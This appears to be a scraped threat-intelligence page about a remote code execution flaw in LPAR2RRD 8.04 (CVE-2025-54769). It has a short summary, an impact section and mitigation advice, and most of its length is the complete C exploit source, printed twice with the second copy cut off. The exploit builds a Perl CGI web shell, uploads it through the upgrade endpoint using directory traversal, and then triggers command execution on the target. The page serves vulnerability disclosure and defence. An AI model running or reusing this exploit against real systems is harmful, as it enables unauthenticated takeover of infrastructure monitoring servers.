Reconnecting to live updates…

LPAR2RRD 8.04 - Remote Code Execution (RCE)

Severity: criticalType: exploit

AI Analysis

Technical Summary

LPAR2RRD 8.04 suffers from a critical remote code execution vulnerability that can be exploited via its web interface. LPAR2RRD is a widely used monitoring and capacity planning tool for virtualized environments, including IBM Power Systems and VMware. The vulnerability allows attackers to remotely execute arbitrary code without authentication or user interaction, which can lead to full system compromise. The exploit code is publicly available in C, facilitating weaponization by threat actors. Although no patches or official mitigations have been released, the exploit targets the web-facing components, making exposure to the internet or untrusted networks particularly dangerous. The lack of a CVSS score notwithstanding, the critical severity rating is justified due to the high impact on confidentiality, integrity, and availability, combined with ease of exploitation. Organizations relying on LPAR2RRD 8.04 should urgently assess exposure, implement network segmentation, and monitor for exploitation attempts. Given the tool’s role in managing critical virtualized infrastructure, successful exploitation could disrupt business operations and lead to data breaches.

Potential Impact

The impact on European organizations could be severe, especially those operating large-scale virtualized environments using LPAR2RRD 8.04. Successful exploitation would allow attackers to execute arbitrary code remotely, potentially leading to full system compromise, data theft, or disruption of critical monitoring and capacity planning functions. This could degrade the performance and availability of virtualized infrastructure, affecting business continuity. Confidentiality breaches could expose sensitive operational data, while integrity violations might manipulate monitoring data, misleading administrators. The ease of exploitation and lack of authentication requirements increase the risk of widespread attacks. Organizations in sectors such as finance, telecommunications, and government, which rely heavily on virtualized infrastructure and IBM Power Systems, are particularly vulnerable. The absence of patches means that mitigation relies on network controls and monitoring, increasing operational overhead and risk.

Mitigation Recommendations

1. Immediately restrict access to the LPAR2RRD web interface by implementing strict network segmentation and firewall rules, allowing only trusted management networks to connect. 2. Deploy web application firewalls (WAFs) with custom rules to detect and block exploit attempts targeting LPAR2RRD. 3. Monitor logs and network traffic for unusual activity indicative of exploitation attempts, including unexpected code execution or anomalous requests to the web interface. 4. Disable or isolate the LPAR2RRD 8.04 instance from internet-facing networks until a patch is available. 5. Engage with the vendor or community to obtain updates or patches as soon as they are released and plan rapid deployment. 6. Conduct internal audits to identify all instances of LPAR2RRD 8.04 in the environment to ensure comprehensive coverage of mitigation efforts. 7. Consider deploying intrusion detection systems (IDS) with signatures for this exploit once available. 8. Educate IT and security teams about this vulnerability to ensure prompt detection and response.

Affected Countries

Germany, United Kingdom, France, Netherlands, Italy, Spain

Indicators of Compromise

exploit-code: /* * Author : Byte Reaper * Title : LPAR2RRD 8.04 - Remote Code Execution (RCE) * CVE : CVE-2025-54769 * Vulnerability: RCE && directory traversal * Description : Uploads a malicious Perl script via the LPAR2RRD upgrade endpoint, * exploits directory traversal to place it in a CGI-executable path, then triggers remote command execution. */ #include <stdio.h> #include <stdlib.h> #include <curl/curl.h> #include "argparse.h" #include <string.h> #include <time.h> #include <arpa/inet.h> #define FULL 2500 void sleepAssembly() { struct timespec s ; s.tv_sec = 0; s.tv_nsec = 500000000; __asm__ volatile ( "mov $35, %%rax\n\t" "xor %%rsi, %%rsi\n\t" "syscall\n\t" : : "D" (&s) : "rax", "rsi", "memory" ); } void syscallLinux() { __asm__ volatile ( "mov $0x3C, %%rax\n\t" "xor %%rdi, %%rdi\n\t" "syscall\n\t" : : :"rax", "rdi" ); } int fileS = 0; int useCookies = 0; int verboseMode = 0; const char *cookies; const char *ip = NULL; int portService = 0; int port = 0; int protocolS = 0; const char *protocol = NULL; int CreateFilePerl() { FILE *fileP = fopen("users.pl", "w"); if (fileP == NULL) { printf("\e[1;31m[-] Error Create File (users.pl)\e[0m\n"); syscallLinux(); return 0; } printf("[+] Create File Successfully\n"); char payloadContent[7000]; int payload = snprintf(payloadContent, sizeof(payloadContent), "#!/usr/bin/perl\n" "use strict;\n" "use warnings;\n" "use CGI;\n" "my $q = CGI->new;\n" "my %%PAR = map { $_ => scalar $q->param($_) } $q->param;\n" "if ( $PAR{cmd} && $PAR{cmd} eq \"commandLinux\")\n" "{\n" "\tprint \"Content-type: text/html\\n\\n\";\n" "\tmy $commandW = qx(/usr/bin/whoami 2>&1);\n" "\tprint $commandW;\n" "}\n" ); if (payload < 0 || (size_t)payload >= sizeof(payloadContent)) { fprintf(stderr, "\e[1;31m[-] Perl payload truncated or formatting error\e[0m\n"); syscallLinux(); } size_t e = strlen(payloadContent); unsigned long writeLen = fwrite(payloadContent, 1, strlen(payloadContent), fileP); if (writeLen != e) { printf("\e[1;31m[-] Error Fwrite Payload in File Perl\e[0m\n"); syscallLinux(); return 0; } printf("\e[1;36m[+] Write Payload in File Successfully\e[0m\n"); fclose(fileP); return 1; } const char *resultCommand[] = { "root", "admin", "user", "ssh", "/home/", NULL }; struct Mem { char *buffer; size_t len; }; size_t write_cb(void *ptr, size_t size, size_t nmemb, void *userdata) { size_t total = size * nmemb; struct Mem *m = (struct Mem *)userdata; char *tmp = realloc(m->buffer, m->len + total + 1); if (tmp == NULL) { fprintf(stderr, "\e[1;31m[-] Failed to allocate memory!\e[0m\n"); syscallLinux(); } m->buffer = tmp; memcpy(&(m->buffer[m->len]), ptr, total); m->len += total; m->buffer[m->len] = '\0'; return total; } void getRequest(CURL *curl, const char *targetIP) { struct Mem responseGet ; responseGet.buffer = NULL; responseGet.len = 0; CURLcode codeLib; char full[FULL]; const char *proto = protocolS ? protocol : "https"; int prt = portService ? port : (strcmp(proto, "http") == 0 ? 80 : 443); int n = snprintf(full, sizeof(full), "%s://%s:%d/lpar2rrd-cgi/users.sh?cmd=commandLinux", proto, targetIP, prt); if (n < 0 || (size_t)n >= sizeof(full)) { fprintf(stderr, "\e[1;31m[-] URL buffer too small\e[0m\n"); syscallLinux(); } curl_easy_setopt(curl, CURLOPT_URL, full); curl_easy_setopt(curl, CURLOPT_FOLLOWLOCATION, 1L); curl_easy_setopt(curl, CURLOPT_WRITEFUNCTION, write_cb); curl_easy_setopt(curl, CURLOPT_WRITEDATA, &responseGet); curl_easy_setopt(curl, CURLOPT_CONNECTTIMEOUT, 5L); sleepAssembly(); curl_easy_setopt(curl, CURLOPT_TIMEOUT, 10L); if (useCookies) { curl_easy_setopt(curl, CURLOPT_COOKIEFILE, cookies); curl_easy_setopt(curl, CURLOPT_COOKIEJAR, cookies); } if (verboseMode) { printf("\e[1;35m------------------------------------------[Verbose Curl]------------------------------------------\e[0m\n"); curl_easy_setopt(curl, CURLOPT_VERBOSE, 1L); } printf("\e[1;37m[+] GET URL: %s\e[0m\n", full); struct curl_slist *headers = NULL; headers = curl_slist_append(headers , "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"); headers = curl_slist_append(headers, "Accept-Language: en-US,en;q=0.5"); headers = curl_slist_append(headers, "Accept-Encoding: gzip, deflate, br"); headers = curl_slist_append(headers, "Upgrade-Insecure-Requests: 1"); headers = curl_slist_append(headers, "Sec-Fetch-Dest: document"); headers = curl_slist_append(headers, "Sec-Fetch-Mode: navigate"); headers = curl_slist_append(headers, "Priority: u=0, i"); headers = curl_slist_append(headers, "Pragma: no-cache"); headers = curl_slist_append(headers, "Cache-Control: no-cache"); headers = curl_slist_append(headers, "Connection: keep-alive"); curl_easy_setopt(curl, CURLOPT_HTTPHEADER, headers); codeLib = curl_easy_perform(curl); curl_slist_free_all(headers); if (codeLib == CURLE_OK) { printf("\e[1;35m=================================================== [GET] ===================================================\e[0m\n"); long codeH = 0; curl_easy_getinfo(curl, CURLINFO_RESPONSE_CODE, &codeH); printf("\e[1;36m[+] Request GET sent successfully\e[0m\n"); printf("\e[1;32m[+] Http Code -> %ld\e[0m\n", codeH); if (responseGet.buffer) { if (verboseMode) { printf("\e[1;35m=================================================== [RESPONSE] ===================================================\e[0m\n"); printf("%s\n", responseGet.buffer); printf("\e[1;35m===================================================================================================================\e[0m\n"); } } if (codeH >= 200 && codeH < 300) { printf("\e[1;36m[+] Positive Http Code (200 < 300) : %ld\e[0m\n",codeH); printf("\e[1;32m[+] Http Code -> %ld\e[0m\n", codeH); if (responseGet.buffer) { printf("\e[1;35m=================================================== [RESPONSE] ===================================================\n"); printf("%s\n", responseGet.buffer); printf("\e[1;32m[+] Len Response : %zu\e[0m\n", responseGet.len); printf("\e[1;35m===================================================================================================================\n"); for (int j = 0; resultCommand[j]; j++) { if (strstr(responseGet.buffer, resultCommand[j])) { printf("\e[1;34m[+] Word Found In Response.\e[0m\n"); printf("\e[1;34m[+] Word : %s\e[0m\n", resultCommand[j]); printf("\e[1;36m[+] The server is experiencing a vulnerability (CVE-2025-54769)\e[0m\n"); } else { if (verboseMode) { printf("\e[1;31m[-] Not Found Word In Response : %s\e[0m\n", resultCommand[j]); } else { continue; } } } } else { printf("\e[1;31m[-] Response Server Is NULL !\e[0m\n"); if (verboseMode) { printf("\e[1;31m[-] Exit Syscall\e[0m\n"); } } } else { printf("\e[1;31m[-] HTTP Code Not Range Positive (200 < 300) : %ld\e[0m\n", codeH); if (verboseMode) { if (responseGet.buffer) { printf("\e[1;35m\n=========================================== [Response] ===========================================\e[0m\n"); printf("%s\n", responseGet.buffer); printf("\e[1;32m[+] Len Response : %zu\n",responseGet.len); printf("\e[1;35m\n=============================================================================================\e[0m\n"); } } } } else { fprintf(stderr,"\e[1;31m[-] Error Send Request\e[0m\n"); fprintf(stderr,"\e[1;31m[-] Error : %s\e[0m\n", curl_easy_strerror(codeLib)); syscallLinux(); } free(responseGet.buffer); responseGet.buffer = NULL; responseGet.len = 0; curl_easy_cleanup(curl); } void remoteCode(const char *ipS) { CURL *curl = curl_easy_init(); struct Mem response; response.buffer = NULL; response.len = 0; CURLcode codeLibCurl; if (verboseMode) { printf("\e[1;35m================================== [Value Response] ==================================\n"); printf("\e[1;32m[+] Response Buffer -> %s\e[0m\n", response.buffer); printf("\e[1;32m[+] Response Len -> %zu\e[0m\n", response.len); printf("\e[1;35m=======================================================================================\n"); } if (!curl) { fprintf(stderr, "\e[1;31m[-] Failed to init CURL\e[0m\n"); syscallLinux(); } char full[FULL]; const char *proto = protocolS ? protocol : "https"; int prt = portService ? port : (strcmp(proto, "http") == 0 ? 80 : 443); int n = snprintf(full, sizeof(full), "%s://%s:%d/lpar2rrd-cgi/upgrade.sh", proto, ipS, prt); if (n < 0 || (size_t)n >= sizeof(full)) { fprintf(stderr, "\e[1;31m[-] URL buffer too small\e[0m\n"); syscallLinux(); } if (!CreateFilePerl()) { fprintf(stderr, "\e[1;31m[-] Failed to create File users.pl\e[0m\n"); syscallLinux(); } printf("\e[1;34m[+] Uploading %s to %s\n", "users.pl", full); curl_mime *form = curl_mime_init(curl); curl_mimepart *field = curl_mime_addpart(form); curl_mime_name(field, "upgfile"); curl_mime_filedata(field, "users.pl"); curl_mime_filename(field, "users.pl"); curl_mime_type(field, "application/x-perl"); curl_easy_setopt(curl, CURLOPT_URL, full); curl_easy_setopt(curl, CURLOPT_POST, 1L); curl_easy_setopt(curl, CURLOPT_MIMEPOST, form); curl_easy_setopt(curl, CURLOPT_WRITEFUNCTION, write_cb); curl_easy_setopt(curl, CURLOPT_WRITEDATA, &response); curl_easy_setopt(curl, CURLOPT_FOLLOWLOCATION, 1L); curl_easy_setopt(curl, CURLOPT_CONNECTTIMEOUT, 5L); sleepAssembly(); curl_easy_setopt(curl, CURLOPT_TIMEOUT, 10L); if (useCookies) { curl_easy_setopt(curl, CURLOPT_COOKIEFILE, cookies); curl_easy_setopt(curl, CURLOPT_COOKIEJAR, cookies); } if (verboseMode) { printf("\e[1;35m------------------------------------------[Verbose Curl]------------------------------------------\e[0m\n"); curl_easy_setopt(curl, CURLOPT_VERBOSE, 1L); } struct curl_slist *headers = NULL; char host[128]; int lenIp = snprintf(host , sizeof(host), "Host: %s:%d", ipS, prt); if (lenIp < 0 || (size_t)lenIp >= sizeof(host)) { printf("\e[1;31m[-] IP Address is Long !\e[0m\n"); syscallLinux(); } headers = curl_slist_append(headers, "Accept: */*"); headers = curl_slist_append(headers, "Accept-Language: en-US,en;q=0.5"); headers = curl_slist_append(headers, "Accept-Encoding: gzip, deflate, br"); headers = curl_slist_append(headers, "X-Requested-With: XMLHttpRequest"); headers = curl_slist_append(headers, "Connection: keep-alive"); headers = curl_slist_append(headers, "Priority: u=0"); headers = curl_slist_append(headers, "Authorization: <base64-credentials>"); headers = curl_slist_append(headers, "Referer: http://127.0.0.1/lpar2rrd/index.html?amenu=upgrade&tab=0"); headers = curl_slist_append(headers , host); void *m = memset(host , 0, sizeof(host)); if (m == NULL) { fprintf(stderr,"\e[1;31m[-] Error Clean HOST IP (memset() == NULL)\e[0m\n"); syscallLinux(); } int lenO = snprintf(host , sizeof(host), "Origin: https://%s:%d", ipS, prt); if (lenO < 0 || (size_t)lenO >= sizeof(host)) { syscallLinux(); } headers = curl_slist_append(headers, host); curl_easy_setopt(curl, CURLOPT_HTTPHEADER, headers); codeLibCurl = curl_easy_perform(curl); curl_mime_free(form); curl_slist_free_all(headers); if (codeLibCurl != CURLE_OK) { fprintf(stderr, "\e[1;31m[-] curl error: %s\e[0m\n", curl_easy_strerror(codeLibCurl)); syscallLinux(); } long httpCode = 0; curl_easy_getinfo(curl, CURLINFO_RESPONSE_CODE, &httpCode); printf("\e[1;36m[+] Protocol : %s\e[0m\n", protocol); printf("\e[1;36m[+] Port : %d\e[0m\n", port); printf("\e[1;32m[+] Http Code -> %ld\e[0m\n", httpCode);; if (httpCode >= 200 && httpCode < 300) { printf("\e[1;36m[+] Positive Http Code (200 < 300) : %ld\e[0m\n",httpCode); if (response.buffer) { printf("\e[1;35m\n=========================================== [Response] ===========================================\e[0m\n"); printf("%s\n", response.buffer); printf("\e[1;32m [+] Len Response : %zu\e[0m\n",response.len); printf("\e[1;35m\n=============================================================================================\e[0m\n"); if (strstr(response.buffer, "This file doesn't look like the upgrade package")) { printf("\e[1;34m[+] Sentence found in reply.\e[0m\n"); printf("\e[1;34m[+] Sentence : This file doesn't look like the upgrade package\e[0m\n"); printf("\e[1;34m[+] Exploitation is being completed...\e[0m\n"); getRequest(curl, ipS); } } else { fprintf(stderr,"\e[1;31m[-] Response Buffer is NULL\e[0m\n"); fprintf(stderr,"\e[1;31m[-] Please Check Your Connection Or Waf\e[0m\n"); if (verboseMode) { fprintf(stderr,"\e[1;31m[-] Exit Syscall...\e[0m\n"); } syscallLinux(); } } else { printf("\e[1;31m[-] HTTP Code Not Range Positive (200 < 300) : %ld\e[0m\n", httpCode); if (verboseMode) { if (response.buffer) { printf("\e[1;35m\n=========================================== [Response] ===========================================\e[0m\n"); printf("%s\n", response.buffer); printf("\e[1;32m[-] Len Response : %zu\n",response.len); printf("\e[1;35m\n=============================================================================================\e[0m\n"); } } } free(response.buffer); response.buffer = NULL; response.len = 0; curl_easy_cleanup(curl); } int main(int argc, const char **argv) { printf( "\e[1;31m" "▄▖▖▖▄▖ ▄▖▄▖▄▖▄▖ ▄▖▖▖▄▖▄▖▄▖ \n" "▌ ▌▌▙▖▄▖▄▌▛▌▄▌▙▖▄▖▙▖▙▌ ▌▙▖▙▌ \n" "▙▖▚▘▙▖ ▙▖█▌▙▖▄▌ ▄▌ ▌ ▌▙▌▄▌ \n" "\e[1;37m\t\tByte Reaper\n" ); curl_global_init(CURL_GLOBAL_DEFAULT); printf("\e[1;31m------------------------------------------------------------------------------------\e[0m\n"); struct argparse_option options[] = { OPT_HELP(), OPT_STRING('i', "ip", &ip, "Enter Target IP"), OPT_STRING('c', "cookies", &cookies, "cookies File"), OPT_INTEGER('p', "port", &port , "Enter Target Port Service"), OPT_STRING('t', "protocol", &protocol, "Enter Protocol Service (http / https)"), OPT_BOOLEAN('v', "verbose", &verboseMode, "Verbose Mode"), OPT_END(), }; struct argparse argparse; argparse_init(&argparse, options, NULL, 0); argparse_parse(&argparse, argc, argv); in_addr_t q = inet_addr(ip); if (q == INADDR_NONE) { printf("\e[1;31m[-] Invalid Ip String !\e[0m\n"); syscallLinux(); } if (!ip) { fprintf(stderr,"\e[1;31m[-] Please Enter Target IP !\e[0m\n"); fprintf(stderr,"\e[1;31m[-] Ex : ./exploit -i <IP> \e[0m\n"); fprintf(stderr,"\e[1;31m[-] Exit Syscall\e[0m\n"); syscallLinux(); } if (verboseMode) { verboseMode = 1; } if (cookies) { useCookies = 1; } if (port) { portService = 1; } if (protocol) { protocolS = 1; } remoteCode(ip); curl_global_cleanup(); return 0; }

LPAR2RRD 8.04 - Remote Code Execution (RCE)

Severity: critical

Type: exploit

LPAR2RRD 8.04 - Remote Code Execution (RCE)

Technical Summary

Potential Impact

Mitigation Recommendations

Affected Countries

Germany, United Kingdom, France, Netherlands, Italy, Spain

Indicators of Compromise

exploit-code: /* * Author : Byte Reaper * Title : LPAR2RRD 8.04 - Remote Code Execution (RCE) * CVE : CVE-2025-54769 * Vulnerability: RCE && directory traversal * Description : Uploads a malicious Perl script via the LPAR2RRD upgrade endpoint, * exploits directory traversal to place it in a CGI-executable path, then triggers remote command execution. */ #include <stdio.h> #include <stdlib.h> #include <curl/curl.h> #include "argparse.h" #include <string.h> #include <time.h> #include <arpa/inet.h> #define FULL 2500 void sleepAssembly() { struct timespec s ; s.tv_sec = 0; s.tv_nsec = 500000000; __asm__ volatile ( "mov $35, %%rax\n\t" "xor %%rsi, %%rsi\n\t" "syscall\n\t" : : "D" (&s) : "rax", "rsi", "memory" ); } void syscallLinux() { __asm__ volatile ( "mov $0x3C, %%rax\n\t" "xor %%rdi, %%rdi\n\t" "syscall\n\t" : : :"rax", "rdi" ); } int fileS = 0; int useCookies = 0; int verboseMode = 0; const char *cookies; const char *ip = NULL; int portService = 0; int port = 0; int protocolS = 0; const char *protocol = NULL; int CreateFilePerl() { FILE *fileP = fopen("users.pl", "w"); if (fileP == NULL) { printf("\e[1;31m[-] Error Create File (users.pl)\e[0m\n"); syscallLinux(); return 0; } printf("[+] Create File Successfully\n"); char payloadContent[7000]; int payload = snprintf(payloadContent, sizeof(payloadContent), "#!/usr/bin/perl\n" "use strict;\n" "use warnings;\n" "use CGI;\n" "my $q = CGI->new;\n" "my %%PAR = map { $_ => scalar $q->param($_) } $q->param;\n" "if ( $PAR{cmd} && $PAR{cmd} eq \"commandLinux\")\n" "{\n" "\tprint \"Content-type: text/html\\n\\n\";\n" "\tmy $commandW = qx(/usr/bin/whoami 2>&1);\n" "\tprint $commandW;\n" "}\n" ); if (payload < 0 || (size_t)payload >= sizeof(payloadContent)) { fprintf(stderr, "\e[1;31m[-] Perl payload truncated or formatting error\e[0m\n"); syscallLinux(); } size_t e = strlen(payloadContent); unsigned long writeLen = fwrite(payloadContent, 1, strlen(payloadContent), fileP); if (writeLen != e) { printf("\e[1;31m[-] Error Fwrite Payload in File Perl\e[0m\n"); syscallLinux(); return 0; } printf("\e[1;36m[+] Write Payload in File Successfully\e[0m\n"); fclose(fileP); return 1; } const char *resultCommand[] = { "root", "admin", "user", "ssh", "/home/", NULL }; struct Mem { char *buffer; size_t len; }; size_t write_cb(void *ptr, size_t size, size_t nmemb, void *userdata) { size_t total = size * nmemb; struct Mem *m = (struct Mem *)userdata; char *tmp = realloc(m->buffer, m->len + total + 1); if (tmp == NULL) { fprintf(stderr, "\e[1;31m[-] Failed to allocate memory!\e[0m\n"); syscallLinux(); } m->buffer = tmp; memcpy(&(m->buffer[m->len]), ptr, total); m->len += total; m->buffer[m->len] = '\0'; return total; } void getRequest(CURL *curl, const char *targetIP) { struct Mem responseGet ; responseGet.buffer = NULL; responseGet.len = 0; CURLcode codeLib; char full[FULL]; const char *proto = protocolS ? protocol : "https"; int prt = portService ? port : (strcmp(proto, "http") == 0 ? 80 : 443); int n = snprintf(full, sizeof(full), "%s://%s:%d/lpar2rrd-cgi/users.sh?cmd=commandLinux", proto, targetIP, prt); if (n < 0 || (size_t)n >= sizeof(full)) { fprintf(stderr, "\e[1;31m[-] URL buffer too small\e[0m\n"); syscallLinux(); } curl_easy_setopt(curl, CURLOPT_URL, full); curl_easy_setopt(curl, CURLOPT_FOLLOWLOCATION, 1L); curl_easy_setopt(curl, CURLOPT_WRITEFUNCTION, write_cb); curl_easy_setopt(curl, CURLOPT_WRITEDATA, &responseGet); curl_easy_setopt(curl, CURLOPT_CONNECTTIMEOUT, 5L); sleepAssembly(); curl_easy_setopt(curl, CURLOPT_TIMEOUT, 10L); if (useCookies) { curl_easy_setopt(curl, CURLOPT_COOKIEFILE, cookies); curl_easy_setopt(curl, CURLOPT_COOKIEJAR, cookies); } if (verboseMode) { printf("\e[1;35m------------------------------------------[Verbose Curl]------------------------------------------\e[0m\n"); curl_easy_setopt(curl, CURLOPT_VERBOSE, 1L); } printf("\e[1;37m[+] GET URL: %s\e[0m\n", full); struct curl_slist *headers = NULL; headers = curl_slist_append(headers , "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"); headers = curl_slist_append(headers, "Accept-Language: en-US,en;q=0.5"); headers = curl_slist_append(headers, "Accept-Encoding: gzip, deflate, br"); headers = curl_slist_append(headers, "Upgrade-Insecure-Requests: 1"); headers = curl_slist_append(headers, "Sec-Fetch-Dest: document"); headers = curl_slist_append(headers, "Sec-Fetch-Mode: navigate"); headers = curl_slist_append(headers, "Priority: u=0, i"); headers = curl_slist_append(headers, "Pragma: no-cache"); headers = curl_slist_append(headers, "Cache-Control: no-cache"); headers = curl_slist_append(headers, "Connection: keep-alive"); curl_easy_setopt(curl, CURLOPT_HTTPHEADER, headers); codeLib = curl_easy_perform(curl); curl_slist_free_all(headers); if (codeLib == CURLE_OK) { printf("\e[1;35m=================================================== [GET] ===================================================\e[0m\n"); long codeH = 0; curl_easy_getinfo(curl, CURLINFO_RESPONSE_CODE, &codeH); printf("\e[1;36m[+] Request GET sent successfully\e[0m\n"); printf("\e[1;32m[+] Http Code -> %ld\e[0m\n", codeH); if (responseGet.buffer) { if (verboseMode) { printf("\e[1;35m=================================================== [RESPONSE] ===================================================\e[0m\n"); printf("%s\n", responseGet.buffer); printf("\e[1;35m===================================================================================================================\e[0m\n"); } } if (codeH >= 200 && codeH < 300) { printf("\e[1;36m[+] Positive Http Code (200 < 300) : %ld\e[0m\n",codeH); printf("\e[1;32m[+] Http Code -> %ld\e[0m\n", codeH); if (responseGet.buffer) { printf("\e[1;35m=================================================== [RESPONSE] ===================================================\n"); printf("%s\n", responseGet.buffer); printf("\e[1;32m[+] Len Response : %zu\e[0m\n", responseGet.len); printf("\e[1;35m===================================================================================================================\n"); for (int j = 0; resultCommand[j]; j++) { if (strstr(responseGet.buffer, resultCommand[j])) { printf("\e[1;34m[+] Word Found In Response.\e[0m\n"); printf("\e[1;34m[+] Word : %s\e[0m\n", resultCommand[j]); printf("\e[1;36m[+] The server is experiencing a vulnerability (CVE-2025-54769)\e[0m\n"); } else { if (verboseMode) { printf("\e[1;31m[-] Not Found Word In Response : %s\e[0m\n", resultCommand[j]); } else { continue; } } } } else { printf("\e[1;31m[-] Response Server Is NULL !\e[0m\n"); if (verboseMode) { printf("\e[1;31m[-] Exit Syscall\e[0m\n"); } } } else { printf("\e[1;31m[-] HTTP Code Not Range Positive (200 < 300) : %ld\e[0m\n", codeH); if (verboseMode) { if (responseGet.buffer) { printf("\e[1;35m\n=========================================== [Response] ===========================================\e[0m\n"); printf("%s\n", responseGet.buffer); printf("\e[1;32m[+] Len Response : %zu\n",responseGet.len); printf("\e[1;35m\n=============================================================================================\e[0m\n"); } } } } else { fprintf(stderr,"\e[1;31m[-] Error Send Request\e[0m\n"); fprintf(stderr,"\e[1;31m[-] Error : %s\e[0m\n", curl_easy_strerror(codeLib)); syscallLinux(); } free(responseGet.buffer); responseGet.buffer = NULL; responseGet.len = 0; curl_easy_cleanup(curl); } void remoteCode(const char *ipS) { CURL *curl = curl_easy_init(); struct Mem response; response.buffer = NULL; response.len = 0; CURLcode codeLibCurl; if (verboseMode) { printf("\e[1;35m================================== [Value Response] ==================================\n"); printf("\e[1;32m[+] Response Buffer -> %s\e[0m\n", response.buffer); printf("\e[1;32m[+] Response Len -> %zu\e[0m\n", response.len); printf("\e[1;35m=======================================================================================\n"); } if (!curl) { fprintf(stderr, "\e[1;31m[-] Failed to init CURL\e[0m\n"); syscallLinux(); } char full[FULL]; const char *proto = protocolS ? protocol : "https"; int prt = portService ? port : (strcmp(proto, "http") == 0 ? 80 : 443); int n = snprintf(full, sizeof(full), "%s://%s:%d/lpar2rrd-cgi/upgrade.sh", proto, ipS, prt); if (n < 0 || (size_t)n >= sizeof(full)) { fprintf(stderr, "\e[1;31m[-] URL buffer too small\e[0m\n"); syscallLinux(); } if (!CreateFilePerl()) { fprintf(stderr, "\e[1;31m[-] Failed to create File users.pl\e[0m\n"); syscallLinux(); } printf("\e[1;34m[+] Uploading %s to %s\n", "users.pl", full); curl_mime *form = curl_mime_init(curl); curl_mimepart *field = curl_mime_addpart(form); curl_mime_name(field, "upgfile"); curl_mime_filedata(field, "users.pl"); curl_mime_filename(field, "users.pl"); curl_mime_type(field, "application/x-perl"); curl_easy_setopt(curl, CURLOPT_URL, full); curl_easy_setopt(curl, CURLOPT_POST, 1L); curl_easy_setopt(curl, CURLOPT_MIMEPOST, form); curl_easy_setopt(curl, CURLOPT_WRITEFUNCTION, write_cb); curl_easy_setopt(curl, CURLOPT_WRITEDATA, &response); curl_easy_setopt(curl, CURLOPT_FOLLOWLOCATION, 1L); curl_easy_setopt(curl, CURLOPT_CONNECTTIMEOUT, 5L); sleepAssembly(); curl_easy_setopt(curl, CURLOPT_TIMEOUT, 10L); if (useCookies) { curl_easy_setopt(curl, CURLOPT_COOKIEFILE, cookies); curl_easy_setopt(curl, CURLOPT_COOKIEJAR, cookies); } if (verboseMode) { printf("\e[1;35m------------------------------------------[Verbose Curl]------------------------------------------\e[0m\n"); curl_easy_setopt(curl, CURLOPT_VERBOSE, 1L); } struct curl_slist *headers = NULL; char host[128]; int lenIp = snprintf(host , sizeof(host), "Host: %s:%d", ipS, prt); if (lenIp < 0 || (size_t)lenIp >= sizeof(host)) { printf("\e[1;31m[-] IP Address is Long !\e[0m\n"); syscallLinux(); } headers = curl_slist_append(headers, "Accept: */*"); headers = curl_slist_append(headers, "Accept-Language: en-US,en;q=0.5"); headers = curl_slist_append(headers, "Accept-Encoding: gzip, deflate, br"); headers = curl_slist_append(headers, "X-Requested-With: XMLHttpRequest"); headers = curl_slist_append(headers, "Connection: keep-alive"); headers = curl_slist_append(headers, "Priority: u=0"); headers = curl_slist_append(headers, "Authorization: <base64-credentials>"); headers = curl_slist_append(headers, "Referer: http://127.0.0.1/lpar2rrd/index.html?amenu=upgrade&tab=0"); headers = curl_slist_append(headers , host); void *m = memset(host , 0, sizeof(host)); if (m == NULL) { fprintf(stderr,"\e[1;31m[-] Error Clean HOST IP (memset() == NULL)\e[0m\n"); syscallLinux(); } int lenO = snprintf(host , sizeof(host), "Origin: https://%s:%d", ipS, prt); if (lenO < 0 || (size_t)lenO >= sizeof(host)) { syscallLinux(); } headers = curl_slist_append(headers, host); curl_easy_setopt(curl, CURLOPT_HTTPHEADER, headers); codeLibCurl = curl_easy_perform(curl); curl_mime_free(form); curl_slist_free_all(headers); if (codeLibCurl != CURLE_OK) { fprintf(stderr, "\e[1;31m[-] curl error: %s\e[0m\n", curl_easy_strerror(codeLibCurl)); syscallLinux(); } long httpCode = 0; curl_easy_getinfo(curl, CURLINFO_RESPONSE_CODE, &httpCode); printf("\e[1;36m[+] Protocol : %s\e[0m\n", protocol); printf("\e[1;36m[+] Port : %d\e[0m\n", port); printf("\e[1;32m[+] Http Code -> %ld\e[0m\n", httpCode);; if (httpCode >= 200 && httpCode < 300) { printf("\e[1;36m[+] Positive Http Code (200 < 300) : %ld\e[0m\n",httpCode); if (response.buffer) { printf("\e[1;35m\n=========================================== [Response] ===========================================\e[0m\n"); printf("%s\n", response.buffer); printf("\e[1;32m [+] Len Response : %zu\e[0m\n",response.len); printf("\e[1;35m\n=============================================================================================\e[0m\n"); if (strstr(response.buffer, "This file doesn't look like the upgrade package")) { printf("\e[1;34m[+] Sentence found in reply.\e[0m\n"); printf("\e[1;34m[+] Sentence : This file doesn't look like the upgrade package\e[0m\n"); printf("\e[1;34m[+] Exploitation is being completed...\e[0m\n"); getRequest(curl, ipS); } } else { fprintf(stderr,"\e[1;31m[-] Response Buffer is NULL\e[0m\n"); fprintf(stderr,"\e[1;31m[-] Please Check Your Connection Or Waf\e[0m\n"); if (verboseMode) { fprintf(stderr,"\e[1;31m[-] Exit Syscall...\e[0m\n"); } syscallLinux(); } } else { printf("\e[1;31m[-] HTTP Code Not Range Positive (200 < 300) : %ld\e[0m\n", httpCode); if (verboseMode) { if (response.buffer) { printf("\e[1;35m\n=========================================== [Response] ===========================================\e[0m\n"); printf("%s\n", response.buffer); printf("\e[1;32m[-] Len Response : %zu\n",response.len); printf("\e[1;35m\n=============================================================================================\e[0m\n"); } } } free(response.buffer); response.buffer = NULL; response.len = 0; curl_easy_cleanup(curl); } int main(int argc, const char **argv) { printf( "\e[1;31m" "▄▖▖▖▄▖ ▄▖▄▖▄▖▄▖ ▄▖▖▖▄▖▄▖▄▖ \n" "▌ ▌▌▙▖▄▖▄▌▛▌▄▌▙▖▄▖▙▖▙▌ ▌▙▖▙▌ \n" "▙▖▚▘▙▖ ▙▖█▌▙▖▄▌ ▄▌ ▌ ▌▙▌▄▌ \n" "\e[1;37m\t\tByte Reaper\n" ); curl_global_init(CURL_GLOBAL_DEFAULT); printf("\e[1;31m------------------------------------------------------------------------------------\e[0m\n"); struct argparse_option options[] = { OPT_HELP(), OPT_STRING('i', "ip", &ip, "Enter Target IP"), OPT_STRING('c', "cookies", &cookies, "cookies File"), OPT_INTEGER('p', "port", &port , "Enter Target Port Service"), OPT_STRING('t', "protocol", &protocol, "Enter Protocol Service (http / https)"), OPT_BOOLEAN('v', "verbose", &verboseMode, "Verbose Mode"), OPT_END(), }; struct argparse argparse; argparse_init(&argparse, options, NULL, 0); argparse_parse(&argparse, argc, argv); in_addr_t q = 